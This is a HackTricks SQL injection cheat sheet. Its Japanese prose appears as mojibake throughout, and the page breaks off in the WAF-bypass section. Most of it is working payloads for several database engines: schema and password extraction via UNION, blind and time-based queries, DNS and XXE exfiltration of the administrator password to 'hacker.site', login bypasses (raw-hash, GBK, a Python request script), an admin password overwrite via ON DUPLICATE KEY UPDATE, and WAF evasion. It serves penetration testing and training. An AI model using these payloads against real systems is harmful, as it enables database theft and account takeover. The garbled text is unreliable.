.. | ||
mysql-injection | ||
postgresql-injection | ||
sqlmap | ||
cypher-injection-neo4j.md | ||
ms-access-sql-injection.md | ||
mssql-injection.md | ||
oracle-injection.md | ||
README.md | ||
sqlmap.md |
SQL Injection
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the ð¬ Discord group or the telegram group or follow us on Twitter ðŠ @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
ââââRootedCON 㯠ã¹ãã€ã³ ã§æãéèŠãªãµã€ããŒã»ãã¥ãªãã£ã€ãã³ãã§ããããšãŒããã ã§æãéèŠãªã€ãã³ãã®äžã€ã§ããæè¡çç¥èã®ä¿é²ã䜿åœãšãããã®äŒè°ã¯ããããåéã®æè¡ãšãµã€ããŒã»ãã¥ãªãã£ã®å°é家ãéãŸãç±ã亀æµã®å Žã§ãã
{% embed url="https://www.rootedcon.com/" %}
SQLã€ã³ãžã§ã¯ã·ã§ã³ãšã¯ïŒ
SQLã€ã³ãžã§ã¯ã·ã§ã³ ã¯ãæ»æè ãã¢ããªã±ãŒã·ã§ã³ã®ããŒã¿ããŒã¹ã¯ãšãªã«å¹²æžããããšãå¯èœã«ããã»ãã¥ãªãã£ã®æ¬ é¥ã§ãããã®è匱æ§ã«ãããæ»æè ã¯ä»ã®ãŠãŒã¶ãŒã®æ å ±ãã¢ããªã±ãŒã·ã§ã³ãã¢ã¯ã»ã¹ã§ããä»»æã®ããŒã¿ã衚瀺ãå€æŽããŸãã¯åé€ããããšãã§ããŸãããã®ãããªè¡çºã¯ãã¢ããªã±ãŒã·ã§ã³ã®æ©èœãã³ã³ãã³ãã«æ°žç¶çãªå€æŽãããããããããµãŒããŒã®äŸµå®³ããµãŒãã¹ã®æåŠãåŒãèµ·ããå¯èœæ§ããããŸãã
ãšã³ããªãŒãã€ã³ãã®æ€åº
ãµã€ããSQLã€ã³ãžã§ã¯ã·ã§ã³ïŒSQLiïŒã«è匱ã§ããããã«èŠããå ŽåãSQLié¢é£ã®å ¥åã«å¯Ÿããç°åžžãªãµãŒããŒå¿çããããšããæåã®ã¹ãããã¯ã¯ãšãªãäžæããããšãªãããŒã¿ãæ³šå ¥ããæ¹æ³ãç解ããããšã§ããããã«ã¯ãçŸåšã®ã³ã³ããã¹ãããå¹æçã«è±åºããæ¹æ³ãç¹å®ããå¿ èŠããããŸãããããã¯åœ¹ç«ã€ããã€ãã®äŸã§ã:
[Nothing]
'
"
`
')
")
`)
'))
"))
`))
次ã«ããšã©ãŒãçºçããªãããã«ã¯ãšãªãä¿®æ£ããæ¹æ³ãç¥ã£ãŠããå¿ èŠããããŸããã¯ãšãªãä¿®æ£ããã«ã¯ãããŒã¿ãå ¥åããŠåã®ã¯ãšãªãæ°ããããŒã¿ãåãå ¥ããããã«ããããåã«ããŒã¿ãå ¥åããŠæåŸã«ã³ã¡ã³ãèšå·ãè¿œå ããããšãã§ããŸãã
ãšã©ãŒã¡ãã»ãŒãžã衚瀺ãããå Žåããã¯ãšãªãæ£åžžã«åäœããŠãããšããšããã§ãªããšãã®éããèŠã€ããããšãã§ããå Žåããã®ãã§ãŒãºã¯ããç°¡åã«ãªããŸãã
ã³ã¡ã³ã
MySQL
#comment
-- comment [Note the space after the double dash]
/*comment*/
/*! MYSQL Special SQL */
PostgreSQL
--comment
/*comment*/
MSQL
--comment
/*comment*/
Oracle
--comment
SQLite
--comment
/*comment*/
HQL
HQL does not support comments
è«çæŒç®ã«ãã確èª
SQLã€ã³ãžã§ã¯ã·ã§ã³ã®è匱æ§ã確èªããä¿¡é Œã§ããæ¹æ³ã¯ãè«çæŒç®ãå®è¡ããæåŸ
ãããçµæã芳å¯ããããšã§ããäŸãã°ã?username=Peter
ãšããGETãã©ã¡ãŒã¿ã?username=Peter' or '1'='1
ã«å€æŽããŠãåãå
容ãåŸãããå ŽåãSQLã€ã³ãžã§ã¯ã·ã§ã³ã®è匱æ§ã瀺åãããŸãã
åæ§ã«ãæ°åŠæŒç®ã®é©çšãå¹æçãªç¢ºèªæè¡ãšããŠæ©èœããŸããäŸãã°ã?id=1
ãš?id=2-1
ã«ã¢ã¯ã»ã¹ããŠåãçµæãåŸãããå ŽåãSQLã€ã³ãžã§ã¯ã·ã§ã³ã瀺ããŠããŸãã
è«çæŒç®ç¢ºèªã瀺ãäŸ:
page.asp?id=1 or 1=1 -- results in true
page.asp?id=1' or 1=1 -- results in true
page.asp?id=1" or 1=1 -- results in true
page.asp?id=1 and 1=2 -- results in false
ãã®åèªãªã¹ãã¯ãææ¡ãããæ¹æ³ã§SQLã€ã³ãžã§ã¯ã·ã§ã³ã確èªããããã«äœæãããŸããïŒ
{% file src="../../.gitbook/assets/sqli-logic.txt" %}
ã¿ã€ãã³ã°ã«ãã確èª
å Žåã«ãã£ãŠã¯ããã¹ãããŠããããŒãžã«å€åãèŠãããªãããšããããŸãããããã£ãŠããã©ã€ã³ãSQLã€ã³ãžã§ã¯ã·ã§ã³ãçºèŠããè¯ãæ¹æ³ã¯ãDBã«ã¢ã¯ã·ã§ã³ãå®è¡ãããããŒãžã®èªã¿èŸŒã¿ã«ãããæéã«åœ±é¿ãäžããããšã§ãã
ãããã£ãŠãSQLã¯ãšãªã«å®äºããã®ã«å€ãã®æéããããæäœãé£çµããŸãïŒ
MySQL (string concat and logical ops)
1' + sleep(10)
1' and sleep(10)
1' && sleep(10)
1' | sleep(10)
PostgreSQL (only support string concat)
1' || pg_sleep(10)
MSQL
1' WAITFOR DELAY '0:0:10'
Oracle
1' AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
1' AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10)
SQLite
1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
å Žåã«ãã£ãŠã¯ãsleepé¢æ°ãèš±å¯ãããªãããšããããŸãããã®å Žåããããã®é¢æ°ã䜿çšãã代ããã«ãã¯ãšãªãè€éãªæäœãå®è¡ãããããšãã§ããæ°ç§ãããããã«ããããšãã§ããŸãããããã®æè¡ã®äŸã¯ãåæè¡ããšã«å¥ã ã«ã³ã¡ã³ããããäºå®ã§ãïŒããããã°ïŒã
ããã¯ãšã³ãã®ç¹å®
ããã¯ãšã³ããç¹å®ããæè¯ã®æ¹æ³ã¯ãç°ãªãããã¯ãšã³ãã®é¢æ°ãå®è¡ããããšããããšã§ããåã®ã»ã¯ã·ã§ã³ã®_sleep_ é¢æ°ãããããã®é¢æ°ã䜿çšããããšãã§ããŸãïŒpayloadsallthethingsã®è¡šïŒïŒ
["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"],
["connection_id()=connection_id()" ,"MYSQL"],
["crc32('MySQL')=crc32('MySQL')" ,"MYSQL"],
["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)" ,"MSSQL"],
["@@CONNECTIONS>0" ,"MSSQL"],
["@@CONNECTIONS=@@CONNECTIONS" ,"MSSQL"],
["@@CPU_BUSY=@@CPU_BUSY" ,"MSSQL"],
["USER_ID(1)=USER_ID(1)" ,"MSSQL"],
["ROWNUM=ROWNUM" ,"ORACLE"],
["RAWTOHEX('AB')=RAWTOHEX('AB')" ,"ORACLE"],
["LNNVL(0=123)" ,"ORACLE"],
["5::int=5" ,"POSTGRESQL"],
["5::integer=5" ,"POSTGRESQL"],
["pg_client_encoding()=pg_client_encoding()" ,"POSTGRESQL"],
["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"],
["quote_literal(42.5)=quote_literal(42.5)" ,"POSTGRESQL"],
["current_database()=current_database()" ,"POSTGRESQL"],
["sqlite_version()=sqlite_version()" ,"SQLITE"],
["last_insert_rowid()>1" ,"SQLITE"],
["last_insert_rowid()=last_insert_rowid()" ,"SQLITE"],
["val(cvar(1))=1" ,"MSACCESS"],
["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0" ,"MSACCESS"],
["cdbl(1)=cdbl(1)" ,"MSACCESS"],
["1337=1337", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
["'i'='i'", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
ãŸããã¯ãšãªã®åºåã«ã¢ã¯ã»ã¹ã§ããå Žåã¯ãããŒã¿ããŒã¹ã®ããŒãžã§ã³ã衚瀺ãããããšãã§ããŸãã
{% hint style="info" %} ç¶ããŠãç°ãªãçš®é¡ã®SQLã€ã³ãžã§ã¯ã·ã§ã³ãæªçšããããã®ããŸããŸãªæ¹æ³ã«ã€ããŠèª¬æããŸããMySQLãäŸãšããŠäœ¿çšããŸãã {% endhint %}
PortSwiggerã䜿çšããèå¥
{% embed url="https://portswigger.net/web-security/sql-injection/cheat-sheet" %}
ãŠããªã³ããŒã¹ã®æªçš
ã«ã©ã æ°ã®æ€åº
ã¯ãšãªã®åºåãèŠããå Žåãããã¯æªçšããããã®æè¯ã®æ¹æ³ã§ãã
ãŸãæåã«ãåæãªã¯ãšã¹ããè¿ãã«ã©ã ã®æ°ãç¹å®ããå¿
èŠããããŸããããã¯ãäž¡æ¹ã®ã¯ãšãªãåãæ°ã®ã«ã©ã ãè¿ãå¿
èŠãããããã§ãã
ãã®ç®çã®ããã«é垞䜿çšããã2ã€ã®æ¹æ³ããããŸãïŒ
ORDER BY / GROUP BY
ã¯ãšãªã®ã«ã©ã æ°ãç¹å®ããã«ã¯ãORDER BYãŸãã¯GROUP BYå¥ã§äœ¿çšãããæ°ã段éçã«èª¿æŽãã誀ã£ãå¿çãè¿ããããŸã§ç¶ããŸããSQLå ã®GROUP BYãšORDER BYã®ç°ãªãæ©èœã«ãããããããäž¡æ¹ã¯ã¯ãšãªã®ã«ã©ã æ°ã確èªããããã«åæ§ã«å©çšã§ããŸãã
1' ORDER BY 1--+ #True
1' ORDER BY 2--+ #True
1' ORDER BY 3--+ #True
1' ORDER BY 4--+ #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+ True
1' GROUP BY 1--+ #True
1' GROUP BY 2--+ #True
1' GROUP BY 3--+ #True
1' GROUP BY 4--+ #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+ True
UNION SELECT
ã¯ãšãªãæ£ãããªããŸã§ãããå€ãã®NULLå€ãéžæããŸã:
1' UNION SELECT null-- - Not working
1' UNION SELECT null,null-- - Not working
1' UNION SELECT null,null,null-- - Worked
null
å€ã䜿çšããã¹ãã§ãããªããªããã¯ãšãªã®äž¡åŽã®ã«ã©ã ã®åãåãã§ãªããã°ãªããªãå Žåããããnullã¯ãã¹ãŠã®ã±ãŒã¹ã§æå¹ã ããã§ãã
ããŒã¿ããŒã¹åãããŒãã«åãã«ã©ã åã®æœåº
次ã®äŸã§ã¯ããã¹ãŠã®ããŒã¿ããŒã¹ã®ååãããŒã¿ããŒã¹ã®ããŒãã«åãããŒãã«ã®ã«ã©ã åãååŸããŸãïŒ
#Database names
-1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata
#Tables of a database
-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,table_name,0x7C) fRoM information_schema.tables wHeRe table_schema=[database]
#Column names
-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]
ç°ãªãããŒã¿ããŒã¹ããšã«ãã®ããŒã¿ãçºèŠããæ¹æ³ã¯ç°ãªããŸãããåžžã«åãæ¹æ³è«ã§ãã
é ãããŠããªã³ããŒã¹ã®æªçš
ã¯ãšãªã®åºåã衚瀺ãããŠãããããŠããªã³ããŒã¹ã®ã€ã³ãžã§ã¯ã·ã§ã³ãéæã§ããªãå Žåãããã¯é ãããŠããªã³ããŒã¹ã®ã€ã³ãžã§ã¯ã·ã§ã³ã®ååšã瀺ããŠããŸãããã®ã·ããªãªã¯ãã°ãã°ãã©ã€ã³ãã€ã³ãžã§ã¯ã·ã§ã³ã®ç¶æ³ã«ã€ãªãããŸãããã©ã€ã³ãã€ã³ãžã§ã¯ã·ã§ã³ããŠããªã³ããŒã¹ã®ãã®ã«å€æããã«ã¯ãããã¯ãšã³ãã§ã®å®è¡ã¯ãšãªãç¹å®ããå¿ èŠããããŸãã
ããã¯ããã©ã€ã³ãã€ã³ãžã§ã¯ã·ã§ã³æè¡ãšã¿ãŒã²ããã®ããŒã¿ããŒã¹ç®¡çã·ã¹ãã ïŒDBMSïŒã«ç¹æã®ããã©ã«ãããŒãã«ã䜿çšããããšã§éæã§ããŸãããããã®ããã©ã«ãããŒãã«ãç解ããããã«ã¯ãã¿ãŒã²ããDBMSã®ããã¥ã¡ã³ããåç §ããããšããå§ãããŸãã
ã¯ãšãªãæœåºãããããå ã®ã¯ãšãªãå®å šã«éããããã«ãã€ããŒãã調æŽããå¿ èŠããããŸãããã®åŸããŠããªã³ã¯ãšãªããã€ããŒãã«è¿œå ããæ°ãã«ã¢ã¯ã»ã¹å¯èœãªãŠããªã³ããŒã¹ã®ã€ã³ãžã§ã¯ã·ã§ã³ãæªçšã§ããããã«ããŸãã
ããå æ¬çãªæŽå¯ã«ã€ããŠã¯ãHealing Blind Injectionsã§å©çšå¯èœãªå®å šãªèšäºãåç §ããŠãã ããã
ãšã©ãŒããŒã¹ã®æªçš
äœããã®çç±ã§ã¯ãšãªã®åºåãèŠãããšãã§ããªããããšã©ãŒã¡ãã»ãŒãžã¯èŠãããšãã§ããå Žåããããã®ãšã©ãŒã¡ãã»ãŒãžã䜿çšããŠããŒã¿ããŒã¹ããããŒã¿ããšã¯ã¹ãã£ã«ãã¬ãŒãããããšãã§ããŸãã
ãŠããªã³ããŒã¹ã®æªçšãšåæ§ã®æµãã«åŸã£ãŠãDBããã³ãããããšãã§ãããããããŸããã
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
Blind SQLiã®æªçš
ãã®å Žåãã¯ãšãªã®çµæããšã©ãŒãèŠãããšã¯ã§ããŸããããã¯ãšãªãtrueãŸãã¯falseã®å¿çãè¿ããšãã«ãããŒãžäžã®ç°ãªãå
容ã«ãã£ãŠåºå¥ããããšãã§ããŸãã
ãã®å Žåããã®åäœãæªçšããŠããŒã¿ããŒã¹ãæåããšã«ãã³ãããããšãã§ããŸã:
?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables = 'A'
Exploiting Error Blind SQLi
ããã¯ä»¥åãšåãã±ãŒã¹ã§ãããã¯ãšãªããã®çåœå¿çãåºå¥ãã代ããã«ãSQLã¯ãšãªã®ãšã©ãŒããããã©ãããåºå¥ããããšãã§ããŸãïŒããããHTTPãµãŒããŒãã¯ã©ãã·ã¥ããããïŒããããã£ãŠããã®å Žåãæ£ããæåãæšæž¬ãããã³ã«SQLãšã©ãŒã匷å¶ããããšãã§ããŸã:
AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
æéããŒã¹ã®SQLiã®æªçš
ãã®å ŽåãããŒãžã®ã³ã³ããã¹ãã«åºã¥ããŠã¯ãšãªã®å¿çãåºå¥ããæ¹æ³ã¯ãããŸãããããããæšæž¬ããæåãæ£ããå ŽåãããŒãžãèªã¿èŸŒãã®ã«æéããããããã«ããããšãã§ããŸãããã®æè¡ã¯ãã¿ã€ãã³ã°ã§ç¢ºèªããããã«ä»¥åã«äœ¿çšãããŠããã®ãèŠãããšããããŸãã
1 and (select sleep(10) from users where SUBSTR(table_name,1,1) = 'A')#
ã¹ã¿ãã¯ã¯ãšãª
ã¹ã¿ãã¯ã¯ãšãªã䜿çšããŠãè€æ°ã®ã¯ãšãªãé£ç¶ããŠå®è¡ã§ããŸããåŸç¶ã®ã¯ãšãªãå®è¡ãããéãçµæã¯ã¢ããªã±ãŒã·ã§ã³ã«è¿ãããŸããããããã£ãŠããã®æè¡ã¯äž»ã«ãã©ã€ã³ãè匱æ§ã«é¢é£ããŠäœ¿çšããã2çªç®ã®ã¯ãšãªã䜿çšããŠDNSã«ãã¯ã¢ãããæ¡ä»¶ä»ããšã©ãŒããŸãã¯æéé 延ãããªã¬ãŒã§ããŸãã
Oracleã¯ã¹ã¿ãã¯ã¯ãšãªããµããŒãããŠããŸãããMySQLãMicrosoftãããã³PostgreSQLã¯ããããµããŒãããŠããŸã: QUERY-1-HERE; QUERY-2-HERE
ãã³ãå€ã®æªçš
ä»ã®æªçšæ¹æ³ãæ©èœããªãã£ãå ŽåãããŒã¿ããŒã¹ãæ å ±ãããªããå¶åŸ¡ããå€éšãã¹ãã«æµåºãããããã«è©Šã¿ãããšãã§ããŸããããšãã°ãDNSã¯ãšãªãä»ããŠ:
select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
XXEãä»ããã¢ãŠããªããã³ãããŒã¿æµåº
a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.hacker.site/"> %remote;]>'),'/l') FROM dual-- -
èªååãããæªçš
SQLMap ããŒãã·ãŒãã確èªããŠãsqlmapã䜿çšããŠSQLiè匱æ§ãæªçšããŠãã ããã
æè¡ç¹æã®æ å ±
SQLã€ã³ãžã§ã¯ã·ã§ã³è匱æ§ãæªçšããæ¹æ³ã«ã€ããŠã¯ãã§ã«è°è«ããŸããããã®æ¬ã§ã¯ãããŒã¿ããŒã¹æè¡ã«äŸåããããã€ãã®ããªãã¯ãèŠã€ããŠãã ããïŒ
ãŸããMySQLãPostgreSQLãOracleãMSSQLãSQLiteãHQLã«é¢ããå€ãã®ããªãã¯ã https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injectionã«ãããŸãã
âââââRootedCONã¯ãã¹ãã€ã³ã§æãé¢é£æ§ã®é«ããµã€ããŒã»ãã¥ãªãã£ã€ãã³ãã§ããããšãŒãããã§æãéèŠãªã€ãã³ãã®äžã€ã§ããæè¡ç¥èã®ä¿é²ã䜿åœãšããŠããã®äŒè°ã¯ããããåéã®æè¡ãšãµã€ããŒã»ãã¥ãªãã£ã®å°é家ã®ç±ã亀æµã®å Žã§ãã
{% embed url="https://www.rootedcon.com/" %}
èªèšŒãã€ãã¹
ãã°ã€ã³æ©èœããã€ãã¹ããããã«è©Šããªã¹ãïŒ
{% content-ref url="../login-bypass/sql-login-bypass.md" %} sql-login-bypass.md {% endcontent-ref %}
çã®ããã·ã¥èªèšŒãã€ãã¹
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
ãã®ã¯ãšãªã¯ãèªèšŒãã§ãã¯ã§çã®åºåã«å¯ŸããŠtrueã䜿çšããå Žåã«MD5ãè匱æ§ã瀺ãããšã瀺ããŠããŸããããã«ãããã·ã¹ãã ã¯SQLã€ã³ãžã§ã¯ã·ã§ã³ã«å¯ŸããŠè匱ã«ãªããŸããæ»æè ã¯ãããã·ã¥åããããšãã«äºæããªãSQLã³ãã³ãã®äžéšãçæããå ¥åãäœæããããšã§ãããæªçšããäžæ£ã¢ã¯ã»ã¹ãåŒãèµ·ããããšãã§ããŸãã
md5("ffifdyop", true) = 'or'6<EFBFBD>]<EFBFBD><EFBFBD>!r,<EFBFBD><EFBFBD>b<EFBFBD>
sha1("3fDf ", true) = Q<EFBFBD>u'='<EFBFBD>@<EFBFBD>[<EFBFBD>t<EFBFBD>- o<EFBFBD><EFBFBD>_-!
æ³šå ¥ãããããã·ã¥èªèšŒãã€ãã¹
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
æšå¥šãªã¹ã:
åè¡ã®ãªã¹ãããŠãŒã¶ãŒåãšããŠäœ¿çšãããã¹ã¯ãŒãã¯åžžã«: Pass1234.
(ãã®ãã€ããŒãã¯ããã®ã»ã¯ã·ã§ã³ã®æåã§èšåããã倧ããªãªã¹ãã«ãå«ãŸããŠããŸã)
{% file src="../../.gitbook/assets/sqli-hashbypass.txt" %}
GBK èªèšŒãã€ãã¹
IF ' ããšã¹ã±ãŒããããŠããå Žå㯠%A8%27 ã䜿çšã§ãã' ããšã¹ã±ãŒãããããšæ¬¡ã®ããã«äœæãããŸã: 0xA80x5c0x27 (â')
%A8%27 OR 1=1;-- 2
%8C%A8%27 OR 1=1-- 2
%bf' or 1=1 -- --
Pythonã¹ã¯ãªãã:
import requests
url = "http://example.com/index.php"
cookies = dict(PHPSESSID='4j37giooed20ibi12f3dqjfbkp3')
datas = {"login": chr(0xbf) + chr(0x27) + "OR 1=1 #", "password":"test"}
r = requests.post(url, data = datas, cookies=cookies, headers={'referrer':url})
print r.text
ããªã°ãããã€ã³ãžã§ã¯ã·ã§ã³ïŒãã«ãã³ã³ããã¹ãïŒ
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
Insert Statement
æ¢åã®ãªããžã§ã¯ã/ãŠãŒã¶ãŒã®ãã¹ã¯ãŒããå€æŽãã
ãã®ããã«ã¯ãããã¹ã¿ãŒãªããžã§ã¯ãããšåä»ããããæ°ãããªããžã§ã¯ããäœæããïŒããããadminã®å ŽåïŒããã«äœããä¿®æ£ããå¿ èŠããããŸãïŒ
- ååãAdMInïŒå€§æåãšå°æåã®çµã¿åããïŒãšããŠãŠãŒã¶ãŒãäœæãã
- ååã**admin=**ãšããŠãŠãŒã¶ãŒãäœæãã
- SQLãã©ã³ã±ãŒã·ã§ã³æ»æïŒãŠãŒã¶ãŒåãã¡ãŒã«ã«é·ãå¶éãããå ŽåïŒ --> ååãadmin [ããããã®ã¹ããŒã¹] aãšããŠãŠãŒã¶ãŒãäœæãã
SQLãã©ã³ã±ãŒã·ã§ã³æ»æ
ããŒã¿ããŒã¹ãè匱ã§ããŠãŒã¶ãŒåã®æ倧æåæ°ãäŸãã°30ã®å ŽåããŠãŒã¶ãŒadminãåœè£ ãããå Žåã¯ã"admin [30ã¹ããŒã¹] a"ãšãããŠãŒã¶ãŒåãäœæããŠã¿ãŠãã ããã
ããŒã¿ããŒã¹ã¯ãå ¥åããããŠãŒã¶ãŒåãããŒã¿ããŒã¹å ã«ååšãããã確èªããŸããããååšããªããã°ããŠãŒã¶ãŒåãæ倧蚱å¯æåæ°ïŒãã®å Žåã¯"admin [25ã¹ããŒã¹]"ïŒã«åãè©°ãããã®åŸãããŒã¿ããŒã¹å ã§ãŠãŒã¶ãŒãadminããæ°ãããã¹ã¯ãŒãã§æŽæ°ããéã«ãæ«å°Ÿã®ãã¹ãŠã®ã¹ããŒã¹ãèªåçã«åé€ããŸãïŒãšã©ãŒã衚瀺ãããå¯èœæ§ããããŸãããããã¯æåããªãã£ãããšãæå³ããŸããïŒã**
詳现æ å ±: https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html & https://resources.infosecinstitute.com/sql-truncation-attack/#gref
泚: ãã®æ»æã¯ãææ°ã®MySQLã€ã³ã¹ããŒã«ã§ã¯äžèšã®ããã«ã¯æ©èœããªããªããŸããæ¯èŒã¯ããã©ã«ãã§æ«å°Ÿã®ç©ºçœãç¡èŠããŸããããã£ãŒã«ãã®é·ããããé·ãæååãæ¿å ¥ããããšãããšãšã©ãŒãçºçããæ¿å ¥ã¯å€±æããŸãããã®ãã§ãã¯ã«é¢ãã詳现æ å ±: https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation
MySQLæ¿å ¥æéããŒã¹ã®ãã§ãã¯
','',''
ãã§ããã ãè¿œå ããŠãVALUESã¹ããŒãã¡ã³ããçµäºããããšèããŸããé
延ãå®è¡ãããå ŽåãSQLã€ã³ãžã§ã¯ã·ã§ã³ããããŸãã
name=','');WAITFOR%20DELAY%20'0:0:5'--%20-
ON DUPLICATE KEY UPDATE
MySQLã®ON DUPLICATE KEY UPDATE
å¥ã¯ãUNIQUEã€ã³ããã¯ã¹ãŸãã¯PRIMARY KEYã§éè€ããå€ãçºçããè¡ãæ¿å
¥ããããšãããšãã«ãããŒã¿ããŒã¹ãåãã¹ãã¢ã¯ã·ã§ã³ãæå®ããããã«äœ¿çšãããŸãã以äžã®äŸã¯ããã®æ©èœãã©ã®ããã«æªçšãããŠç®¡çè
ã¢ã«ãŠã³ãã®ãã¹ã¯ãŒããå€æŽãããã瀺ããŠããŸãã
Example Payload Injection:
泚å
¥ãã€ããŒãã¯æ¬¡ã®ããã«äœæãããå¯èœæ§ããããusers
ããŒãã«ã«2è¡ãæ¿å
¥ããããšããŠããŸããæåã®è¡ã¯ããšãã§ã2çªç®ã®è¡ã¯æ¢åã®ç®¡çè
ã®ã¡ãŒã«ã¢ãã¬ã¹ãã¿ãŒã²ããã«ããŠãã¹ã¯ãŒããæŽæ°ããæå³ããããŸãïŒ
INSERT INTO users (email, password) VALUES ("generic_user@example.com", "bcrypt_hash_of_newpassword"), ("admin_generic@example.com", "bcrypt_hash_of_newpassword") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_newpassword" -- ";
以äžã®ããã«æ©èœããŸãïŒ
- ã¯ãšãªã¯ã
generic_user@example.com
çšã®1è¡ãšãadmin_generic@example.com
çšã®å¥ã®1è¡ãæ¿å ¥ããããšããŸãã admin_generic@example.com
çšã®è¡ããã§ã«ååšããå ŽåãON DUPLICATE KEY UPDATE
å¥ãããªã¬ãŒãããMySQLã«æ¢åã®è¡ã®password
ãã£ãŒã«ãããbcrypt_hash_of_newpasswordãã«æŽæ°ããããæ瀺ããŸãã- ãã®çµæã
admin_generic@example.com
ã䜿çšããŠãbcryptããã·ã¥ã«å¯Ÿå¿ãããã¹ã¯ãŒãã§èªèšŒãè©Šã¿ãããšãã§ããŸãïŒãbcrypt_hash_of_newpasswordãã¯æ°ãããã¹ã¯ãŒãã®bcryptããã·ã¥ãè¡šããå®éã®ãã¹ã¯ãŒãã®ããã·ã¥ã«çœ®ãæããå¿ èŠããããŸãïŒã
æ å ±ãæœåºãã
åæã«2ã€ã®ã¢ã«ãŠã³ããäœæãã
æ°ãããŠãŒã¶ãŒãäœæããããšããéã«ã¯ããŠãŒã¶ãŒåããã¹ã¯ãŒããã¡ãŒã«ãå¿ èŠã§ãïŒ
SQLi payload:
username=TEST&password=TEST&email=TEST'),('otherUsername','otherPassword',(select flag from flag limit 1))-- -
A new user with username=otherUsername, password=otherPassword, email:FLAG will be created
10é²æ°ãŸãã¯16é²æ°ã®äœ¿çš
ãã®æè¡ã䜿çšãããšã1ã€ã®ã¢ã«ãŠã³ããäœæããã ãã§æ å ±ãæœåºã§ããŸããã³ã¡ã³ããããå¿ èŠã¯ãªãããšã«æ³šæããŠãã ããã
hex2dec ãš substr ã䜿çšããŠ:
'+(select conv(hex(substr(table_name,1,6)),16,10) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
ããã¹ããååŸããã«ã¯ã次ã®ããã«ããŸãïŒ
__import__('binascii').unhexlify(hex(215573607263)[2:])
hex ãš replace (ããã³ substr) ã䜿çšããŠ:
'+(select hex(replace(replace(replace(replace(replace(replace(table_name,"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
'+(select hex(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
#Full ascii uppercase and lowercase replace:
'+(select hex(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%"),"z","&"),"J","'"),"K","`"),"L","("),"M",")"),"N","@"),"O","$$"),"Z","&&")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
ââââââRootedCON 㯠ã¹ãã€ã³ ã§æãé¢é£æ§ã®é«ããµã€ããŒã»ãã¥ãªãã£ã€ãã³ãã§ããããšãŒããã ã§æãéèŠãªã€ãã³ãã®äžã€ã§ãã æè¡çç¥èã®ä¿é² ã䜿åœãšãããã®äŒè°ã¯ããããåéã®æè¡ãšãµã€ããŒã»ãã¥ãªãã£ã®å°é家ãéãŸãç±ã亀æµã®å Žã§ãã
{% embed url="https://www.rootedcon.com/" %}
Routed SQL injection
Routed SQL injection ã¯ãæ³šå ¥å¯èœãªã¯ãšãªãåºåãçæãããã®ã§ã¯ãªããæ³šå ¥å¯èœãªã¯ãšãªã®åºåãåºåãçæããã¯ãšãªã«éãããç¶æ³ã§ãã (From Paper)
Example:
#Hex of: -1' union select login,password from users-- a
-1' union select 0x2d312720756e696f6e2073656c656374206c6f67696e2c70617373776f72642066726f6d2075736572732d2d2061 -- a
WAF ãã€ãã¹
åæãã€ãã¹ã¯ãã¡ã
ã¹ããŒã¹ãªããã€ãã¹
ã¹ããŒã¹ãªã (%20) - ãã¯ã€ãã¹ããŒã¹ã®ä»£æ¿ã䜿çšããŠãã€ãã¹
?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
?id=1%0Band%0B1=1%0B--
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--
No Whitespace - ã³ã¡ã³ãã䜿çšããŠãã€ãã¹
?id=1/*comment*/and/**/1=1/**/--
No Whitespace - æ¬åŒ§ã䜿çšããŠãã€ãã¹
